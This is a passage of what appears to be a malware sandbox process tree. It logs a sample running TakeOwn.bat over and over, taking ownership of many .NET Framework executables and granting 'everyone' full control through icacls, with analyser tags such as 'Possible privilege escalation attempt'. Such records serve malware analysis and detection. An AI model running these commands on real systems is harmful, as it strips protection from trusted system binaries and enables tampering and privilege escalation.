  C:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Local\Temp\TakeOwn.bat "C:\Windows\Microsoft.NET\Framework\v4.0.30319\ServiceModelReg.exe"
  2⤵
  PID:4944
- - C:\Windows\SysWOW64\takeown.exe
    takeown /f "C:\Windows\Microsoft.NET\Framework\v4.0.30319\ServiceModelReg.exe"
    3⤵
    PID:5592
- - C:\Windows\SysWOW64\icacls.exe
    icacls "C:\Windows\Microsoft.NET\Framework\v4.0.30319\ServiceModelReg.exe" /grant "everyone":(f)
    3⤵
    PID:1356
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Local\Temp\TakeOwn.bat "C:\Windows\Microsoft.NET\Framework\v4.0.30319\SMSvcHost.exe"
  2⤵
  PID:5628
- - C:\Windows\SysWOW64\takeown.exe
    takeown /f "C:\Windows\Microsoft.NET\Framework\v4.0.30319\SMSvcHost.exe"
    3⤵
    PID:5608
- - C:\Windows\SysWOW64\icacls.exe
    icacls "C:\Windows\Microsoft.NET\Framework\v4.0.30319\SMSvcHost.exe" /grant "everyone":(f)
    3⤵
    PID:5664
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Local\Temp\TakeOwn.bat "C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe"
  2⤵
  PID:5784
- - C:\Windows\SysWOW64\takeown.exe
    takeown /f "C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe"
    3⤵
    PID:5624
- - C:\Windows\SysWOW64\icacls.exe
    icacls "C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe" /grant "everyone":(f)
    3⤵
    PID:4260
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Local\Temp\TakeOwn.bat "C:\Windows\Microsoft.NET\Framework\v4.0.30319\WsatConfig.exe"
  2⤵
  PID:5660
- - C:\Windows\SysWOW64\takeown.exe
    takeown /f "C:\Windows\Microsoft.NET\Framework\v4.0.30319\WsatConfig.exe"
    3⤵
    - Possible privilege escalation attempt
    PID:1496
- - C:\Windows\SysWOW64\icacls.exe
    icacls "C:\Windows\Microsoft.NET\Framework\v4.0.30319\WsatConfig.exe" /grant "everyone":(f)
    3⤵
    PID:4132
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Local\Temp\TakeOwn.bat "C:\Windows\Microsoft.NET\Framework64\v2.0.50727\AppLaunch.exe"
  2⤵
  PID:2020
- - C:\Windows\SysWOW64\takeown.exe
    takeown /f "C:\Windows\Microsoft.NET\Framework64\v2.0.50727\AppLaunch.exe"
    3⤵
    - Modifies file permissions
    PID:3036
- - C:\Windows\SysWOW64\icacls.exe
    icacls "C:\Windows\Microsoft.NET\Framework64\v2.0.50727\AppLaunch.exe" /grant "everyone":(f)
    3⤵
    PID:2152
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Local\Temp\TakeOwn.bat "C:\Windows\Microsoft.NET\Framework64\v2.0.50727\aspnet_compiler.exe"
  2⤵
  PID:4500
- - C:\Windows\SysWOW64\takeown.exe
    takeown /f "C:\Windows\Microsoft.NET\Framework64\v2.0.50727\aspnet_compiler.exe"
    3⤵
    - System Location Discovery: System Language Discovery
    PID:3148
- - C:\Windows\SysWOW64\icacls.exe
    icacls "C:\Windows\Microsoft.NET\Framework64\v2.0.50727\aspnet_compiler.exe" /grant "everyone":(f)
    3⤵
    PID:4616
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Local\Temp\TakeOwn.bat "C:\Windows\Microsoft.NET\Framework64\v2.0.50727\aspnet_regbrowsers.exe"
  2⤵
  - System Location Discovery: System Language Discovery
  PID:3016
- - C:\Windows\SysWOW64\takeown.exe
    takeown /f "C:\Windows\Microsoft.NET\Framework64\v2.0.50727\aspnet_regbrowsers.exe"
    3⤵
    - Possible privilege escalation attempt
    PID:4876
- - C:\Windows\SysWOW64\icacls.exe
    icacls "C:\Windows\Microsoft.NET\Framework64\v2.0.50727\aspnet_regbrowsers.exe" /grant "everyone":(f)
    3⤵
    PID:3452
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Local\Temp\TakeOwn.bat "C:\Windows\Microsoft.NET\Framework64\v2.0.50727\aspnet_regiis.exe"
  2⤵
  PID:2844
- - C:\Windows\SysWOW64\takeown.exe
    takeown /f "C:\Windows\Microsoft.NET\Framework64\v2.0.50727\aspnet_regiis.exe"
    3⤵
    - Possible privilege escalation attempt
    - Modifies file permissions
    PID:2964
- - C:\Windows\SysWOW64\icacls.exe
    icacls "C:\Windows\Microsoft.NET\Framework64\v2.0.50727\aspnet_regiis.exe" /grant "everyone":(f)
    3⤵
    - Modifies file permissions
    PID:1604
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Local\Temp\TakeOwn.bat "C:\Windows\Microsoft.NET\Framework64\v2.0.50727\aspnet_regsql.exe"
  2⤵
  PID:4000
- - C:\Windows\SysWOW64\takeown.exe
    takeown /f "C:\Windows\Microsoft.NET\Framework64\v2.0.50727\aspnet_regsql.exe"
    3⤵
    - Modifies file permissions
    PID:1848
- - C:\Windows\SysWOW64\icacls.exe
    icacls "C:\Windows\Microsoft.NET\Framework64\v2.0.50727\aspnet_regsql.exe" /grant "everyone":(f)
    3⤵
    PID:1948
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Local\Temp\TakeOwn.bat "C:\Windows\Microsoft.NET\Framework64\v2.0.50727\aspnet_state.exe"
  2⤵
  PID:5828
- - C:\Windows\SysWOW64\takeown.exe
    takeown /f "C:\Windows\Microsoft.NET\Framework64\v2.0.50727\aspnet_state.exe"
    3⤵
    PID:4480
- - C:\Windows\SysWOW64\icacls.exe
    icacls "C:\Windows\Microsoft.NET\Framework64\v2.0.50727\aspnet_state.exe" /grant "everyone":(f)
    3⤵
    - Possible privilege escalation attempt
    PID:6028
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Local\Temp\TakeOwn.bat "C:\Windows\Microsoft.NET\Framework64\v2.0.50727\aspnet_wp.exe"
  2⤵
  PID:996
- - C:\Windows\SysWOW64\takeown.exe
    takeown /f "C:\Windows\Microsoft.NET\Framework64\v2.0.50727\aspnet_wp.exe"
    3⤵
    PID:4516
- - C:\Windows\SysWOW64\icacls.exe
    icacls "C:\Windows\Microsoft.NET\Framework64\v2.0.50727\aspnet_wp.exe" /grant "everyone":(f)
    3⤵
    PID:4520
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Local\Temp\TakeOwn.bat "C:\Windows\Microsoft.NET\Framework64\v2.0.50727\CasPol.exe"
  2⤵
  PID:4640
- - C:\Windows\SysWOW64\takeown.exe
    takeown /f "C:\Windows\Microsoft.NET\Framework64\v2.0.50727\CasPol.exe"
    3⤵
    PID:3932
- - C:\Windows\SysWOW64\icacls.exe
    icacls "C:\Windows\Microsoft.NET\Framework64\v2.0.50727\CasPol.exe" /grant "everyone":(f)
    3⤵
    PID:4620
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Local\Temp\TakeOwn.bat "C:\Windows\Microsoft.NET\Framework64\v2.0.50727\csc.exe"
  2⤵
  PID:4580
- - C:\Windows\System32\Conhost.exe
    \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
    3⤵
    PID:4356
- - C:\Windows\SysWOW64\takeown.exe
    takeown /f "C:\Windows\Microsoft.NET\Framework64\v2.0.50727\csc.exe"
    3⤵
    PID:4452
- - C:\Windows\SysWOW64\icacls.exe
    icacls "C:\Windows\Microsoft.NET\Framework64\v2.0.50727\csc.exe" /grant "everyone":(f)
    3⤵
    PID:1116
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Local\Temp\TakeOwn.bat "C:\Windows\Microsoft.NET\Framework64\v2.0.50727\cvtres.exe"
  2⤵
  PID:5480
- - C:\Windows\SysWOW64\takeown.exe
    takeown /f "C:\Windows\Microsoft.NET\Framework64\v2.0.50727\cvtres.exe"
    3⤵
    - Modifies file permissions
    PID:1364
- - C:\Windows\SysWOW64\icacls.exe
    icacls "C:\Windows\Microsoft.NET\Framework64\v2.0.50727\cvtres.exe" /grant "everyone":(f)
    3⤵
    - Modifies file permissions
    PID:952
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Local\Temp\TakeOwn.bat "C:\Windows\Microsoft.NET\Framework64\v2.0.50727\dfsvc.exe"
  2⤵
  PID:3416
- - C:\Windows\SysWOW64\takeown.exe
    takeown /f "C:\Windows\Microsoft.NET\Framework64\v2.0.50727\dfsvc.exe"
    3⤵
    PID:5504
- - C:\Windows\SysWOW64\icacls.exe
    icacls "C:\Windows\Microsoft.NET\Framework64\v2.0.50727\dfsvc.exe" /grant "everyone":(f)
    3⤵
    PID:5492
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Local\Temp\TakeOwn.bat "C:\Windows\Microsoft.NET\Framework64\v2.0.50727\dw20.exe"
  2⤵
  PID:5700
- - C:\Windows\SysWOW64\takeown.exe
    takeown /f "C:\Windows\Microsoft.NET\Framework64\v2.0.50727\dw20.exe"
    3⤵
    PID:5740
- - C:\Windows\SysWOW64\icacls.exe
    icacls "C:\Windows\Microsoft.NET\Framework64\v2.0.50727\dw20.exe" /grant "everyone":(f)
    3⤵
    - Modifies file permissions
    PID:2176
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Local\Temp\TakeOwn.bat "C:\Windows\Microsoft.NET\Framework64\v2.0.50727\IEExec.exe"
  2⤵
  PID:2628
- - C:\Windows\System32\Conhost.exe
    \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
    3⤵
    PID:5712
- - C:\Windows\SysWOW64\takeown.exe
    takeown /f "C:\Windows\Microsoft.NET\Framework64\v2.0.50727\IEExec.exe"
    3⤵
    PID:5088
- - C:\Windows\SysWOW64\icacls.exe
    icacls "C:\Windows\Microsoft.NET\Framework64\v2.0.50727\IEExec.exe" /grant "everyone":(f)
    3⤵
    PID:5688
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Local\Temp\TakeOwn.bat "C:\Windows\Microsoft.NET\Framework64\v2.0.50727\ilasm.exe"
  2⤵
  PID:3172
- - C:\Windows\System32\Conhost.exe
    \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
    3⤵
    PID:5244
- - C:\Windows\SysWOW64\takeown.exe
    takeown /f "C:\Windows\Microsoft.NET\Framework64\v2.0.50727\ilasm.exe"
    3⤵
    PID:5864
- - C:\Windows\SysWOW64\icacls.exe
    icacls "C:\Windows\Microsoft.NET\Framework64\v2.0.50727\ilasm.exe" /grant "everyone":(f)
    3⤵
    - Possible privilege escalation attempt
    - Modifies file permissions
    - System Location Discovery: System Language Discovery
    PID:2784
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Local\Temp\TakeOwn.bat "C:\Windows\Microsoft.NET\Framework64\v2.0.50727\InstallUtil.exe"
  2⤵
  PID:5528
- - C:\Windows\SysWOW64\takeown.exe
    takeown /f "C:\Windows\Microsoft.NET\Framework64\v2.0.50727\InstallUtil.exe"
    3⤵
    - Modifies file permissions
    PID:5240
- - C:\Windows\SysWOW64\icacls.exe
    icacls "C:\Windows\Microsoft.NET\Framework64\v2.0.50727\InstallUtil.exe" /grant "everyone":(f)
    3⤵
    PID:5304
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Local\Temp\TakeOwn.bat "C:\Windows\Microsoft.NET\Framework64\v2.0.50727\jsc.exe"
  2⤵
  PID:5576
- - C:\Windows\System32\Conhost.exe
    \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
    3⤵
    PID:5636
- - C:\Windows\SysWOW64\takeown.exe
    takeown /f "C:\Windows\Microsoft.NET\Framework64\v2.0.50727\jsc.exe"
    3⤵
    - Modifies file permissions
    PID:5440
- - C:\Windows\SysWOW64\icacls.exe
    icacls "C:\Windows\Microsoft.NET\Framework64\v2.0.50727\jsc.exe" /grant "everyone":(f)
    3⤵
    - Modifies file permissions
    PID:412
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Local\Temp\TakeOwn.bat "C:\Windows\Microsoft.NET\Framework64\v2.0.50727\Ldr64.exe"
  2⤵
  PID:5408
- - C:\Windows\SysWOW64\takeown.exe
    takeown /f "C:\Windows\Microsoft.NET\Framework64\v2.0.50727\Ldr64.exe"
    3⤵
    PID:2460
- - C:\Windows\SysWOW64\icacls.exe
    icacls "C:\Windows\Microsoft.NET\Framework64\v2.0.50727\Ldr64.exe" /grant "everyone":(f)
    3⤵
    PID:5908
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Local\Temp\TakeOwn.bat "C:\Windows\Microsoft.NET\Framework64\v2.0.50727\MSBuild.exe"
  2⤵
  PID:5924
- - C:\Windows\System32\Conhost.exe
    \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
    3⤵
    PID:5912
- - C:\Windows\SysWOW64\takeown.exe
    takeown /f "C:\Windows\Microsoft.NET\Framework64\v2.0.50727\MSBuild.exe"
    3⤵
    - Modifies file permissions
    PID:4624
- - C:\Windows\SysWOW64\icacls.exe
    icacls "C:\Windows\Microsoft.NET\Framework64\v2.0.50727\MSBuild.exe" /grant "everyone":(f)
    3⤵
    PID:5532
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Local\Temp\TakeOwn.bat "C:\Windows\Microsoft.NET\Framework64\v2.0.50727\mscorsvw.exe"
  2⤵
  PID:6116
- - C:\Windows\System32\Conhost.exe
    \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
    3⤵
    PID:2928
- - C:\Windows\SysWOW64\takeown.exe
    takeown /f "C:\Windows\Microsoft.NET\Framework64\v2.0.50727\mscorsvw.exe"
    3⤵
    - System Location Discovery: System Language Discovery
    PID:5940
- - C:\Windows\SysWOW64\icacls.exe
    icacls "C:\Windows\Microsoft.NET\Framework64\v2.0.50727\mscorsvw.exe" /grant "everyone":(f)
    3⤵
    PID:2032
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Local\Temp\TakeOwn.bat "C:\Windows\Microsoft.NET\Framework64\v2.0.50727\ngen.exe"
  2⤵
  PID:2816
- - C:\Windows\System32\Conhost.exe
    \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
    3⤵
    PID:4896
- - C:\Windows\SysWOW64\takeown.exe
    takeown /f "C:\Windows\Microsoft.NET\Framework64\v2.0.50727\ngen.exe"
    3⤵
    PID:5880
- - C:\Windows\SysWOW64\icacls.exe
    icacls "C:\Windows\Microsoft.NET\Framework64\v2.0.50727\ngen.exe" /grant "everyone":(f)
    3⤵
    - Possible privilege escalation attempt
    PID:5944
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Local\Temp\TakeOwn.bat "C:\Windows\Microsoft.NET\Framework64\v2.0.50727\RegAsm.exe"
  2⤵
  PID:5424
- - C:\Windows\SysWOW64\takeown.exe
    takeown /f "C:\Windows\Microsoft.NET\Framework64\v2.0.50727\RegAsm.exe"
    3⤵
    PID:6068
- - C:\Windows\SysWOW64\icacls.exe
    icacls "C:\Windows\Microsoft.NET\Framework64\v2.0.50727\RegAsm.exe" /grant "everyone":(f)
    3⤵
    - Possible privilege escalation attempt
    - Modifies file permissions
    PID:3008
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Local\Temp\TakeOwn.bat "C:\Windows\Microsoft.NET\Framework64\v2.0.50727\RegSvcs.exe"
  2⤵
  PID:744
- - C:\Windows\System32\Conhost.exe
    \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
    3⤵
    PID:4324
- - C:\Windows\SysWOW64\takeown.exe
    takeown /f "C:\Windows\Microsoft.NET\Framework64\v2.0.50727\RegSvcs.exe"
    3⤵
    PID:1048
- - C:\Windows\SysWOW64\icacls.exe
    icacls "C:\Windows\Microsoft.NET\Framework64\v2.0.50727\RegSvcs.exe" /grant "everyone":(f)
    3⤵
    PID:5728
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Local\Temp\TakeOwn.bat "C:\Windows\Microsoft.NET\Framework64\v2.0.50727\vbc.exe"
  2⤵
  PID:2452
- - C:\Windows\SysWOW64\takeown.exe
    takeown /f "C:\Windows\Microsoft.NET\Framework64\v2.0.50727\vbc.exe"
    3⤵
    PID:3756
- - C:\Windows\SysWOW64\icacls.exe
    icacls "C:\Windows\Microsoft.NET\Framework64\v2.0.50727\vbc.exe" /grant "everyone":(f)
    3⤵
    - Possible privilege escalation attempt
    - Modifies file permissions
    PID:5860
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Local\Temp\TakeOwn.bat "C:\Windows\Microsoft.NET\Framework64\v3.0\Windows Communication Foundation\ComSvcConfig.exe"
  2⤵
  PID:312
- - C:\Windows\SysWOW64\takeown.exe
    takeown /f "C:\Windows\Microsoft.NET\Framework64\v3.0\Windows Communication Foundation\ComSvcConfig.exe"
    3⤵
    - Modifies file permissions
    - System Location Discovery: System Language Discovery
    PID:6088
- - C:\Windows\SysWOW64\icacls.exe
    icacls "C:\Windows\Microsoft.NET\Framework64\v3.0\Windows Communication Foundation\ComSvcConfig.exe" /grant "everyone":(f)
    3⤵
    PID:5016
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Local\Temp\TakeOwn.bat "C:\Windows\Microsoft.NET\Framework64\v3.0\Windows Communication Foundation\ServiceModelReg.exe"
  2⤵
  PID:2088
- - C:\Windows\SysWOW64\takeown.exe
    takeown /f "C:\Windows\Microsoft.NET\Framework64\v3.0\Windows Communication Foundation\ServiceModelReg.exe"
    3⤵
    PID:4204
- - C:\Windows\SysWOW64\icacls.exe
    icacls "C:\Windows\Microsoft.NET\Framework64\v3.0\Windows Communication Foundation\ServiceModelReg.exe" /grant "everyone":(f)
    3⤵
    - Possible privilege escalation attempt
    PID:2960
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Local\Temp\TakeOwn.bat "C:\Windows\Microsoft.NET\Framework64\v3.0\Windows Communication Foundation\SMConfigInstaller.exe"
  2⤵
  PID:5916
- - C:\Windows\SysWOW64\takeown.exe
    takeown /f "C:\Windows\Microsoft.NET\Framework64\v3.0\Windows Communication Foundation\SMConfigInstaller.exe"
    3⤵
    PID:4800
- - C:\Windows\SysWOW64\icacls.exe
    icacls "C:\Windows\Microsoft.NET\Framework64\v3.0\Windows Communication Foundation\SMConfigInstaller.exe" /grant "everyone":(f)
    3⤵
    PID:3940
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Local\Temp\TakeOwn.bat "C:\Windows\Microsoft.NET\Framework64\v3.0\Windows Communication Foundation\SMSvcHost.exe"
  2⤵
  PID:5952
- - C:\Windows\SysWOW64\takeown.exe
    takeown /f "C:\Windows\Microsoft.NET\Framework64\v3.0\Windows Communication Foundation\SMSvcHost.exe"
    3⤵
    PID:6064
- - C:\Windows\SysWOW64\icacls.exe
    icacls "C:\Windows\Microsoft.NET\Framework64\v3.0\Windows Communication Foundation\SMSvcHost.exe" /grant "everyone":(f)
    3⤵
    PID:5984
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Local\Temp\TakeOwn.bat "C:\Windows\Microsoft.NET\Framework64\v3.0\Windows Communication Foundation\WsatConfig.exe"
  2⤵
  PID:3740
- - C:\Windows\SysWOW64\takeown.exe
    takeown /f "C:\Windows\Microsoft.NET\Framework64\v3.0\Windows Communication Foundation\WsatConfig.exe"
    3⤵
    - Possible privilege escalation attempt
    PID:6024
- - C:\Windows\SysWOW64\icacls.exe
    icacls "C:\Windows\Microsoft.NET\Framework64\v3.0\Windows Communication Foundation\WsatConfig.exe" /grant "everyone":(f)
    3⤵
    - System Location Discovery: System Language Discovery
    PID:5092
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Local\Temp\TakeOwn.bat "C:\Windows\Microsoft.NET\Framework64\v3.0\WPF\PresentationFontCache.exe"
  2⤵
  PID:4608
- - C:\Windows\SysWOW64\takeown.exe
    takeown /f "C:\Windows\Microsoft.NET\Framework64\v3.0\WPF\PresentationFontCache.exe"
    3⤵
    PID:4296
- - C:\Windows\SysWOW64\icacls.exe
    icacls "C:\Windows\Microsoft.NET\Framework64\v3.0\WPF\PresentationFontCache.exe" /grant "everyone":(f)
    3⤵
    - System Location Discovery: System Language Discovery
    PID:4160
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Local\Temp\TakeOwn.bat "C:\Windows\Microsoft.NET\Framework64\v3.0\WPF\XamlViewer\XamlViewer_v0300.exe"
  2⤵
  PID:3288
- - C:\Windows\SysWOW64\takeown.exe
    takeown /f "C:\Windows\Microsoft.NET\Framework64\v3.0\WPF\XamlViewer\XamlViewer_v0300.exe"
    3⤵
    PID:5080
- - C:\Windows\SysWOW64\icacls.exe
    icacls "C:\Windows\Microsoft.NET\Framework64\v3.0\WPF\XamlViewer\XamlViewer_v0300.exe" /grant "everyone":(f)
    3⤵
    PID:4672
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Local\Temp\TakeOwn.bat "C:\Windows\Microsoft.NET\Framework64\v3.5\AddInProcess.exe"
  2⤵
  PID:5208
- - C:\Windows\SysWOW64\takeown.exe
    takeown /f "C:\Windows\Microsoft.NET\Framework64\v3.5\AddInProcess.exe"
    3⤵
    - System Location Discovery: System Language Discovery
    PID:3752
- - C:\Windows\SysWOW64\icacls.exe
    icacls "C:\Windows\Microsoft.NET\Framework64\v3.5\AddInProcess.exe" /grant "everyone":(f)
    3⤵
    PID:4988
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Local\Temp\TakeOwn.bat "C:\Windows\Microsoft.NET\Framework64\v3.5\AddInProcess32.exe"
  2⤵
  PID:5356
- - C:\Windows\SysWOW64\takeown.exe
    takeown /f "C:\Windows\Microsoft.NET\Framework64\v3.5\AddInProcess32.exe"
    3⤵
    PID:5256
- - C:\Windows\SysWOW64\icacls.exe
    icacls "C:\Windows\Microsoft.NET\Framework64\v3.5\AddInProcess32.exe" /grant "everyone":(f)
    3⤵
    - Possible privilege escalation attempt
    PID:4428
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Local\Temp\TakeOwn.bat "C:\Windows\Microsoft.NET\Framework64\v3.5\AddInUtil.exe"
  2⤵
  - System Location Discovery: System Language Discovery
  PID:5692
- - C:\Windows\SysWOW64\takeown.exe
    takeown /f "C:\Windows\Microsoft.NET\Framework64\v3.5\AddInUtil.exe"
    3⤵
    - Modifies file permissions
    PID:5524
- - C:\Windows\SysWOW64\icacls.exe
    icacls "C:\Windows\Microsoft.NET\Framework64\v3.5\AddInUtil.exe" /grant "everyone":(f)
    3⤵
    PID:5148
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Local\Temp\TakeOwn.bat "C:\Windows\Microsoft.NET\Framework64\v3.5\csc.exe"
  2⤵
  PID:1952
- - C:\Windows\SysWOW64\takeown.exe
    takeown /f "C:\Windows\Microsoft.NET\Framework64\v3.5\csc.exe"
    3⤵
    PID:4152
- - C:\Windows\SysWOW64\icacls.exe
    icacls "C:\Windows\Microsoft.NET\Framework64\v3.5\csc.exe" /grant "everyone":(f)
    3⤵
    - Modifies file permissions
    PID:4944
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Local\Temp\TakeOwn.bat "C:\Windows\Microsoft.NET\Framework64\v3.5\DataSvcUtil.exe"
  2⤵
  PID:3952
- - C:\Windows\SysWOW64\takeown.exe
    takeown /f "C:\Windows\Microsoft.NET\Framework64\v3.5\DataSvcUtil.exe"
    3⤵
    - System Location Discovery: System Language Discovery
    PID:1900
- - C:\Windows\SysWOW64\icacls.exe
    icacls "C:\Windows\Microsoft.NET\Framework64\v3.5\DataSvcUtil.exe" /grant "everyone":(f)
    3⤵
    PID:32
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Local\Temp\TakeOwn.bat "C:\Windows\Microsoft.NET\Framework64\v3.5\EdmGen.exe"
  2⤵
  PID:3812
- - C:\Windows\SysWOW64\takeown.exe
    takeown /f "C:\Windows\Microsoft.NET\Framework64\v3.5\EdmGen.exe"
    3⤵
    PID:5140
- - C:\Windows\SysWOW64\icacls.exe
    icacls "C:\Windows\Microsoft.NET\Framework64\v3.5\EdmGen.exe" /grant "everyone":(f)
    3⤵
    PID:3004
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Local\Temp\TakeOwn.bat "C:\Windows\Microsoft.NET\Framework64\v3.5\MSBuild.exe"
  2⤵
  PID:6044
- - C:\Windows\System32\Conhost.exe
    \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
    3⤵
    PID:4456
- - C:\Windows\SysWOW64\takeown.exe
    takeown /f "C:\Windows\Microsoft.NET\Framework64\v3.5\MSBuild.exe"
    3⤵
    PID:5796
- - C:\Windows\SysWOW64\icacls.exe
    icacls "C:\Windows\Microsoft.NET\Framework64\v3.5\MSBuild.exe" /grant "everyone":(f)
    3⤵
    PID:1868
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Local\Temp\TakeOwn.bat "C:\Windows\Microsoft.NET\Framework64\v3.5\vbc.exe"
  2⤵
  PID:408
- - C:\Windows\SysWOW64\takeown.exe
    takeown /f "C:\Windows\Microsoft.NET\Framework64\v3.5\vbc.exe"
    3⤵
    PID:5788
- - C:\Windows\SysWOW64\icacls.exe
    icacls "C:\Windows\Microsoft.NET\Framework64\v3.5\vbc.exe" /grant "everyone":(f)
    3⤵
    PID:2020
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Local\Temp\TakeOwn.bat "C:\Windows\Microsoft.NET\Framework64\v3.5\WFServicesReg.exe"
  2⤵
  PID:5680
- - C:\Windows\SysWOW64\takeown.exe
    takeown /f "C:\Windows\Microsoft.NET\Framework64\v3.5\WFServicesReg.exe"
    3⤵
    PID:5556
- - C:\Windows\SysWOW64\icacls.exe
    icacls "C:\Windows\Microsoft.NET\Framework64\v3.5\WFServicesReg.exe" /grant "everyone":(f)
    3⤵
    PID:3148
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Local\Temp\TakeOwn.bat "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInProcess.exe"
  2⤵
  PID:2076
- - C:\Windows\System32\Conhost.exe
    \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
    3⤵
    PID:1684
- - C:\Windows\SysWOW64\takeown.exe
    takeown /f "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInProcess.exe"
    3⤵
    PID:3016
- - C:\Windows\SysWOW64\icacls.exe
    icacls "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInProcess.exe" /grant "everyone":(f)
    3⤵
    PID:1724
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Local\Temp\TakeOwn.bat "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInProcess32.exe"
  2⤵
  PID:1100
- - C:\Windows\SysWOW64\takeown.exe
    takeown /f "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInProcess32.exe"
    3⤵
    PID:2164
- - C:\Windows\SysWOW64\icacls.exe
    icacls "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInProcess32.exe" /grant "everyone":(f)
    3⤵
    PID:2184
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Local\Temp\TakeOwn.bat "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInUtil.exe"
  2⤵
  PID:4340
- - C:\Windows\SysWOW64\takeown.exe
    takeown /f "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInUtil.exe"
    3⤵
    PID:5020
- - C:\Windows\SysWOW64\icacls.exe
    icacls "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInUtil.exe" /grant "everyone":(f)
